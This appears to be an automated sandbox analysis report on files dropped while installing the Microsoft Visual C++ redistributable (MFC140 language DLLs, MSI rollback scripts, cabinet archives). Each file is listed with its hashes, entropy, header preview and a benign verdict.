                                                                        SHA1:4EC67C81D7E07E26A785D554F0C04F2560E09BCA
                                                                        SHA-256:2F0E08B7C4F5EF6B2EB3D447385C5E8B5B05AE4897993DC4CB79188B1EC3300A
                                                                        SHA-512:58670741FC42EF0DE3FF54B16533C4217610C809AE8EADD3D3605261286C18DEEB7252751517FE1F3A6B1503BC3C33C88A7CBE10242B018E3AF4ADBD1045CAF1
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d.....f..........." ..."............................................................e.....`A......................................................... ..0...............PO..............p............................................................................rdata..t...........................@..@.rsrc...0.... ......................@..@......f.........X.................f.........l.................f.........$...L...L.........f.............p...p...........................RSDS.....1\....u}......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ........1\....u}../...:;!4f5t...f.........................................................................................................................

                                                                        3cd71b.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69968
                                                                        Entropy (8bit):5.131704941361196
                                                                        Encrypted:false
                                                                        SSDEEP:768:wUVGijcBEhCgy6rAu1HLPLNqyf/nWHBNhdBU2fd5gH8UHg9zG2KPj8g9zGI:/V9zfy6rAuhPLNXf/nWHNfdo8/z6PzZ
                                                                        MD5:F93CC93C178EE0D0DCEC72B6590837B7
                                                                        SHA1:D850AA17E90EAA85505B01191B9B4012CDF37DE6
                                                                        SHA-256:2368B5905DF1D205C956EC94594491241C2B83FD0D22928DFBE1CE7B1657ABE2
                                                                        SHA-512:623BEF9CE6A83A2576CF32E620767AD7DBC8A5C04C48D896B436F60D4A34D56BB44514079AFD6F1580018791D486EE5102C329682F9372AFA514232A4002F209
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...-..w.........." ..."..................................................................`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@....-..w........X...............-..w........l...............-..w........$...L...L.......-..w............p...p...........................RSDS.(..[......(.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ....(..[......(...D..>........-..w........................................................................................................................

                                                                        3cd71c.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):78672
                                                                        Entropy (8bit):4.95404690674315
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gwq6A16B/iKuFm3OKWxRZ/I2+f9Xzu16ttf9Xzut:gwc8B/+HIZf9X4ctf9Xy
                                                                        MD5:7AB83D5CFE5E24FA6ACFD110E2F3DCC7
                                                                        SHA1:F5E7110333D6EEDC511E815FE6DE39856D5F60B9
                                                                        SHA-256:93B2599549721C004A30857A6E105F60CFE3057230109F3B8D1C6CE2C520ADEF
                                                                        SHA-512:936AD912A2219278F490855C68CBAB7C7962CE42D6110603EDFCC5645A7AA8308B3BB84B145E3F75CCC0DBCA62684001D3FDE40484FD593E3B991CCE86EFB3EA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d......4.........." ...".............................................................!....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.......4........X..................4........l..................4........$...L...L..........4............p...p...........................RSDST9<B{.i.Wc-.gX.,....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ESN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..`....rsrc$02.... ...T9<B{.i.Wc-.gX.,...I.F.w._U...4........................................................................................................................

                                                                        3cd71d.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):79696
                                                                        Entropy (8bit):4.957571682646658
                                                                        Encrypted:false
                                                                        SSDEEP:768:926iNYajZELeWYFmNRYxAaTafCp5eQYZmZUjyyyyyyyyyyyyyyyUGQFUbWTVNeTO:9NuqLeW6A2SCHu0jhFzVRzw
                                                                        MD5:B0924A9F3FF2CED936E94AC2DA338CFA
                                                                        SHA1:AD48A45145FAFBAAF450B5DB1378B2B96598EC51
                                                                        SHA-256:06220647576FDB763B9EFC20581EF8A561654F1E6E60B394937B1D2877DBC011
                                                                        SHA-512:AF647F77351A6D1968585627B84C01E9AB3E6B65CB8985F13F0B8586DF912BCBABEACA0FB93C96D302181BBCBA07A80928C39F68B51C6A517DA4560B197DC661
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...Y............" ...".............................................................S....`A......................................................... ..x...............PO..............p............................................................................rdata..t...........................@..@.rsrc...x.... ......................@..@....Y..........X...............Y..........l...............Y..........$...L...L.......Y..............p...p...........................RSDS.$....b..1#'.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140FRA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....$....b..1#'....E..+.OL)RX.Y..........................................................................................................................

                                                                        3cd71e.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):77648
                                                                        Entropy (8bit):4.9589173959336685
                                                                        Encrypted:false
                                                                        SSDEEP:768:hRE6XaCyqbK15M8zwgDGxNIlW3jSCQQQjeqS1hDDg1UWTV8Hkhg9zGDMKvg9zGQ:hnass5M8zwgSxNIlW3GoiTwTzATQz
                                                                        MD5:0B6D7C89EBA8609F9B877CDDB875AB00
                                                                        SHA1:34FA8C4B62BF7E0A12E0C94E9BB8B49F7A78E317
                                                                        SHA-256:B74B0BF88316ADDE2AA8D1455AE9BFA9762D6F7093F8239BEF44D5A802AB2518
                                                                        SHA-512:0BC4A5D5483D4C51CF50254B39107B049B7B92CCE5561456F4524FBD0972C1D85CE4D1F1DEC81772D66D1090D4BFBE4729E0C9004629A760A07C76D66365CE72
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....X............" ..."............................................................S+....`A......................................................... ..X...............PO..............p............................................................................rdata..t...........................@..@.rsrc...X.... ......................@..@.....X..........X................X..........l................X..........$...L...L........X..............p...p...........................RSDS.@..4...5.+.R.V.....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ITA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....@..4...5.+.R.V.a...8...P<-.X..........................................................................................................................

                                                                        3cd71f.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58704
                                                                        Entropy (8bit):6.138297075618846
                                                                        Encrypted:false
                                                                        SSDEEP:768:DanVn/7RfJxsr10/eu9RHreDHYMufiC9zuAbK9MufiC9zue:mnp/7RgunIYVzu39Vzue
                                                                        MD5:8778C8D55C6801171CF2D7161D9D2608
                                                                        SHA1:6875E6B9493D678A384379F8425D6C274E32C378
                                                                        SHA-256:D3BD3C71EC44D51A8F341CA43981A2A32B388DF7A2BBD81C996B97CD4C4E1E1D
                                                                        SHA-512:1111A598441F657DD887150C1D9152A971C3728E4A1DC9C85C249A91143C20E918CB9E0902E0647B9260E6CC150360387EFE14602CEAAC5C6DCFCBB56408F494
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....-............" ..."............................................................t.....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....-..........X................-..........l................-..........$...L...L........-..............p...p...........................RSDS4....iQZ....5pn....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..p....rsrc$02.... ...4....iQZ....5pn..r.s.....O.-..........................................................................................................................

                                                                        3cd720.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58192
                                                                        Entropy (8bit):6.2590221802837
                                                                        Encrypted:false
                                                                        SSDEEP:768:VTQO54LQTNlwUaHqNA3B2I7Cvq/HfJMufiC9zuOK5eMufiC9zufl:Vr51TNlqqNAx2I7CvqvfJVzutUVzufl
                                                                        MD5:17C5AA7148D32622073DBEB124DD7208
                                                                        SHA1:25DB38CE00E4CFC6D4204730955902D38A8DEDCF
                                                                        SHA-256:4D148066E9D361ECCDB6E3245A55164B9FEA2533431EF28F6B431D6ED9F3CA4C
                                                                        SHA-512:47F03C541FE62815DD1ADCC41C04D5F9CB3C0B9A70825A15E87479F9644E513FBFAAA0675B470BBE68D457140AEEDDB5A0579C0AC44C41AAC75132CC7369D65A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....]............" ...".............................................................Y....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....]..........X................]..........l................]..........$...L...L........]..............p...p...........................RSDS.......h...^0w......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140KOR.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...~...rsrc$02.... ..........h...^0w..#....A@R.....]..........................................................................................................................

                                                                        3cd721.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):75600
                                                                        Entropy (8bit):5.490211431615378
                                                                        Encrypted:false
                                                                        SSDEEP:768:/v/gFXOvULiqNWTMHVhtZgFckD9AHkIRmuU9zCHKlRmuU9zhY:f6XOvURhTWckad8zCqPd8zhY
                                                                        MD5:750C7DA20713AC9D54917511B0A25008
                                                                        SHA1:9C65E14D7CD5B76ABBB0BF375EFE14DB25404771
                                                                        SHA-256:E3E959FC260BC6707641645CE84057893F166984FA18324008DB39E4132C5A06
                                                                        SHA-512:C9785A35C024853D6055E8D97754465373D62D486C09F428BCF2E6DF973F360C6991ECC840819CD3C34DB0BD83D42CA28A0DC2C0CF7980B1283B634A517EBDD0
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...B.l..........." ...".............................................................~....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@....B.l.........X...............B.l.........l...............B.l.........$...L...L.......B.l.............p...p...........................RSDS#..7tr...[...5~r....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140RUS.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.. ....rsrc$02.... ...#..7tr...[...5~r.....'/..>..B.l.........................................................................................................................

                                                                        3cd722.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5658960
                                                                        Entropy (8bit):6.7350057529257
                                                                        Encrypted:false
                                                                        SSDEEP:98304:SPjBNrNGV+cJHdFLOAkGkzdnEVomFHKnP+:ONMYudFLOyomFHKnP+
                                                                        MD5:0F3BCCC38502C5543C02266E6E62B738
                                                                        SHA1:4C5EB318EEEA2C208E6931178D3CC5B1D59C4E2B
                                                                        SHA-256:BC9EB4F2C8A8E9F1AB4CF67B935BBE13E5FE456FAA8B9E1D486EF81C27C4D810
                                                                        SHA-512:DE9758B1EAE1C2F1375B415B44DC2B8C3B65FAFAE9AAAB53DB85341F7C00F9499D9DDA9A80A89A3D4FC7F4F7BFFD335564863D5A2EA7719D59E13F7D1EE4F87A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........zv.d.%.d.%.d.%=..$.d.%=..$.d.%=..$.d.%...%.d.%...$.d.%...$.d.%=..$.d.%.d.%.`.%...$.d.%...$.d.%...$te.%...$.d.%...%.d.%...$.d.%Rich.d.%........PE..d...SbKx.........." ..."..-..X).....`F,.......................................V.......V...`A..........................................:.....H.;.......?.`....P=..8....V.PO...@U.(p..P.5.p............................q..@............0-.X.....:......................text...l.-.......-................. ..`.rdata.......0-.......-.............@..@.data....6....<.......;.............@....pdata...8...P=..:....<.............@..@.didat..H.....?.......>.............@....rsrc...`.....?.......?.............@..@.reloc..(p...@U..r....T.............@..B........................................................................................................................................................................................

                                                                        3cd723.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.371033376303132
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Gnn+7eH5QzDxoBTYy+Ajw1dSj6tYhuW0swuw4N3P+ucQUCf9XzuiYIFf9Xzuv:G+S2zDxoBTxT6tYhuW0s/NPbcFCf9Xfo
                                                                        MD5:82E66964F91445140EBAD6563A61AFEC
                                                                        SHA1:B981C47029F23EF809837CBD5EB6DD78C895849C
                                                                        SHA-256:3970DF10C373E72BF929D9D07F40564B89106227349B0CD3A68F485B75D639A7
                                                                        SHA-512:0B912F8E510EB0158BA0091DFF73B94D223F86CC1BE1C0DDA28E044EEB1BBF4103B5B74C90BB9D6CFC3B0B72EC95D48B6693042242A68CD2F5CC3041D4C03AF9
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............eoL.eoL.eoLy.kM.eoL.7.L.eoL..nM.eoL..kM.eoL..lM.eoL...L.eoLy.nM.eoL.enL.eoL..jM.eoL..oM.eoL...L.eoL..mM.eoLRich.eoL........................PE..d.....A..........." ...".F...........O...............................................t....`A.........................................1.......2.......p.......`.......*..PO...........y..p...........................px..@............p..x............u..H............text....A.......B.................. ..`.nep.........`.......F.............. ..`.rdata.......p.......J..............@..@.data...X....@......................@....pdata.......`....... ..............@..@.rsrc........p.......$..............@..@.reloc...............(..............@..B........................................................................................................................................................................................

                                                                        3cd724.rbf (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.367271194012751
                                                                        Encrypted:false
                                                                        SSDEEP:1536:MnKBn5WzzDxSnM5yj6A+JGY0swu6fpXqmLuDhM9nXzuk0lplnXzuk6:pBszDxSnM566A+JGY0sqamaDSX8lX8
                                                                        MD5:386B853F3D5B6A16055C9591BD938F3A
                                                                        SHA1:10A78EF8DC72D010A97BF504B012D0CFE769CFF4
                                                                        SHA-256:F56F5B8208DD2376D4F50F4B3C1689B8DB4D17A4623FF2B8DF71EA9E1721DFF2
                                                                        SHA-512:4BB02FC38884C43E35DFF4019C605A76F5CE1661CA69492CE23D2C13674A0D184786FF17CEEDFACA6653F85CF49B3CDDA9ECB766DE2DFCFA4F72D8273F138475
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............eoL.eoL.eoLy.kM.eoL.7.L.eoL..nM.eoL..kM.eoL..lM.eoL...L.eoLy.nM.eoL.enL.eoL..jM.eoL..oM.eoL...L.eoL..mM.eoLRich.eoL........................PE..d................." ...".F...........O..............................................".....`A.........................................1.......2.......p.......`.......*..PO...........y..p...........................px..@............p..x............u..H............text....A.......B.................. ..`.nep.........`.......F.............. ..`.rdata.......p.......J..............@..@.data...X....@......................@....pdata.......`....... ..............@..@.rsrc........p.......$..............@..@.reloc...............(..............@..B........................................................................................................................................................................................

                                                                        C:\Config.Msi\3cd706.rbs

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16117
                                                                        Entropy (8bit):5.544489066348445
                                                                        Encrypted:false
                                                                        SSDEEP:192:f6MRFKFRaKwCQagA3tGuuuuuuuuA6/e+ZQ2o:fZRFoRaBatso
                                                                        MD5:D2CC3F17F33E210E3B52A811106AC888
                                                                        SHA1:A18362A7D04F5219CDBF7170C843C2B43EFF19F7
                                                                        SHA-256:11AD0149FF8FD629CAAAE96F3DB5EBC7DDE0587C469FAB443C5AE8542972D7F0
                                                                        SHA-512:0B928B2A06225808BEE35BF85C1C9894CECCC1B5A2B50D932601A805779D8DEF09C4E6BA5EB2AC8C46F8F1E8AD36220EBE931E2B27BA58EDA459C37AB7F20DA7
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@b|"V.@.....@.....@.....@.....@.....@......&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6};.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702..vc_runtimeMinimum_x64.msi.@.....@6l...@.....@........&.{5A9DDDD3-76A3-46B4-95D5-90B8CD9429D8}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FD7CAC7F4253D2C47ABD1E16043A5D6E\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\be1ed.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FD7CAC7F4253D2C47ABD1E16043A5D6E\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ......

                                                                        C:\Config.Msi\3cd70c.rbs

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):17962
                                                                        Entropy (8bit):5.533784942024346
                                                                        Encrypted:false
                                                                        SSDEEP:192:fZTnasKF+D8GdMX0wmuuuuuuuuuuP+gzguBeI0XF0XkNEgEgHjpj:fFnasKF+8GdMX0wY8M010wB
                                                                        MD5:8F1F7CE9F5D76EF8C977D3F6DF95D6EC
                                                                        SHA1:3C860A8FC134654B20E9A6E1C1089266C4A44DC9
                                                                        SHA-256:03EEC243AC8530DF4ACC8958C191ED5B5D05FE9A77A764E5477DF21584F3BCB5
                                                                        SHA-512:9B2C961D1A3969BDD3AE44F112CADB12D092A24096AA37F7D2C234F2AD6B40BDFE7B6DDE4578EAC7881FEE71A7A3372DFA0688475A97C4BE60D362DDEC1AD66A
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@b|"V.@.....@.....@.....@.....@.....@......&.{CF4C347D-954E-4543-88D2-EC17F07F466F};.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931..vc_runtimeMinimum_x64.msi.@.....@.|"..@.....@........&.{F4326D14-4FF5-4F81-B678-481B19EBBB51}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{CF4C347D-954E-4543-88D2-EC17F07F466F}.@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{CF4C347D-954E-4543-88D2-EC17F07F466F}.@......&.{B33258FD-750C-3B42-8BE4-535B48E97DB4}&.{CF4C347D-954E-4543-88D2-EC17F07F466F}.@......&.{2427B123-F132-4F0B-A958-50F7CDFCAA56}&.{CF4C347D-954E-4543-88D2-EC17F07F466F}.@......&.{22824972-0C4A-31B4-AEEF-9FC7596F1305}&.{CF4C347D-954E-4543-88D2-EC17F07F466F}.@......&.{6713558D-DE1F-373C-A12D-BAE9004657F9}&

                                                                        C:\Config.Msi\3cd715.rbs

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):17477
                                                                        Entropy (8bit):5.5107395740138925
                                                                        Encrypted:false
                                                                        SSDEEP:192:Xd+6RmKNRnKWKW8/kDG2JzcWeQgWyhRvKwyFtszJIHSejcHAYMwuuuuuuuuuuuuv:XNRmERn1DzHLszJIyejcHAYMQIbI
                                                                        MD5:CD8A002718FBEA84F4BB57D2BCE07609
                                                                        SHA1:EE00D9DEBC15A606A1668624FC68ADE8ECFD7049
                                                                        SHA-256:1A43B488ACD4688DA947DA1E87B65CD4646EE50195524BF3FF3885BCEE116EF4
                                                                        SHA-512:2C7EA7005926954CF6998376A817B7C0057AB67E866550BEC9B78490C30836DF95F264F64A2292B79E123E59045DDE6F8FAEB711AEA841A424BC44DA99515FD6
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@j|"V.@.....@.....@.....@.....@.....@......&.{12578975-C765-4BDF-8DDC-3284BC0E855F}>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702..vc_runtimeAdditional_x64.msi.@.....@6l...@.....@........&.{23CC48B5-925F-41A3-A3E4-90BCB78D5374}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\57987521567CFDB4D8CD2348CBE058F5\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\be1f1.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\57987521567CFDB4D8CD2348CBE058F5\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... .

                                                                        C:\Config.Msi\3cd716.rbs

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):21153
                                                                        Entropy (8bit):5.542485833025635
                                                                        Encrypted:false
                                                                        SSDEEP:384:A22a91MEZw0mp07NjT4fy8hvuQqaIra9L4gfYFRL9tdFhfhLkmS0A:Ava91MEZw0mp07N36y8Qk4L9tjtlkmbA
                                                                        MD5:ACD62FAEDD835D181EF8D2803490D3EF
                                                                        SHA1:8CCC2BFCF9E003B84657DC19AA101BC753870EE0
                                                                        SHA-256:AA4512BCACD446EA1659B288F429032DA6B6710A36CD7C67C404E05D94A7E6D0
                                                                        SHA-512:1B849FFAEEDA133EDBBC4E00D8C85704F6B48500815A8E6BD76EF08B73DEB2381DBD0C55DA3B0A15B9332506DE53F9FD5D61E46DF61B8EE9D28D19F5702E67C3
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@k|"V.@.....@.....@.....@.....@.....@......&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931..vc_runtimeAdditional_x64.msi.@.....@.|"..@.....@........&.{4031CBD1-E566-49F4-B008-5D35253621AE}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}.@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}.@......&.{99A922E3-648F-3C37-8AE6-78232F317B1E}&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}.@......&.{8924DA15-E863-388D-A06B-E7A3931AD77B}&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}.@......&.{32252141-0BE5-3AFE-9849-D281CD954D43}&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}.@......&.{AD221A2C-956B-3F16-8F64-FC938

                                                                        C:\ProgramData\Package Cache\.unverified\cab2C04DDC374BD96EB5C8EB8208F2C7C92 (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 5681793 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 372 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):5691993
                                                                        Entropy (8bit):7.997664401422205
                                                                        Encrypted:true
                                                                        SSDEEP:98304:cMnpn63ARJRnfmPh9YbStjHun8TDpd1LBEQxijqnHEWyK+bFZGujVyqXgpSMsYa1:7n6wZ4YbKHm8JTBLi+nkWSb2oVjXgpDq
                                                                        MD5:62BC0F466E65D9219281CF75C8F91380
                                                                        SHA1:0826A1591B81ACF0FE30D58E19B0A87DF2A49A3E
                                                                        SHA-256:534DD81BE6B7A23A745C36EDA87E6387C5D146C3A96C84793D0EDC7EB85B40F3
                                                                        SHA-512:17713F4228C0C2793C622BBB0A90BD5688D98A6576A695CB956FA233238C4C6E5B0CB43510BE4F072613AD575D0B44E7C847F48B785A161CC337A9E6FDCA3BB5
                                                                        Malicious:false
                                                                        Preview:MSCF......V.....D.............................V..'..............t...@.U.......EU.. .mfc140.dll.H...@.U...EU.. .mfc140chs.dll.P.....V...EU.. .mfc140cht.dll.P7...cW...EU.. .mfc140deu.dll.P...(.X...EU.. .mfc140enu.dll.P3..x.Y...EU.. .mfc140esn.dll.P7....Z...EU.. .mfc140fra.dll.P/....\...EU.. .mfc140ita.dll.P...hF]...EU.. .mfc140jpn.dll.P....+^...EU.. .mfc140kor.dll.P'...._...EU.. .mfc140rus.dll.PYV.X6`...EU.. .mfc140u.dll.Py........EU.. .mfcm140.dll.Py........EU.. .mfcm140u.dll.:G..7..CK.:kxSU.;m...M)....H.b.C[..EI \O..E........Z ...$.H8F..W....Q.BQ.....SP.Q.p91...lA.]k.sr.t.....r..k....O....,.1...@.......?.I.1.8|g"....;ty.F.,\..R......X..-]Z.<....d.e.R.s.L.....&$.Y.<>2T<se~.T.w.....9 ..d..y.......d.5z..^'|....&.......~.'Y;.y.u..|.'~.R.S......*\.r.m....?.fc^:~C^.`#-.1.#..t.~M..3..=.^.u./..0...q.?..2..|..,..\..I~D...#.n6..c.i9l..H.........l.] ..}:..W.,E:v8o.+..gv.>..u.+cX..P/.n....~.kA.....v..z-....c....jT&.OV..+..:.).XN.. .:....,...k.[...F..e..>1..E@.`..I...F.[.by!

                                                                        C:\ProgramData\Package Cache\.unverified\cab5046A8AB272BF37297BB7928664C9503 (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 926116 bytes, 11 files, at 0x44 +A "concrt140.dll" +A "msvcp140.dll", flags 0x4, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):936316
                                                                        Entropy (8bit):7.996550129280269
                                                                        Encrypted:true
                                                                        SSDEEP:24576:7Z6eSPpkI0D4ySp8ZMunuwOxu4qIDFAwkFu:WPOz4ySuFnu5x9hHkI
                                                                        MD5:45C9C674C0BA87F57168D6AB852E9641
                                                                        SHA1:73ACE24362F14DC58D4099DAE6E4E62902E9E950
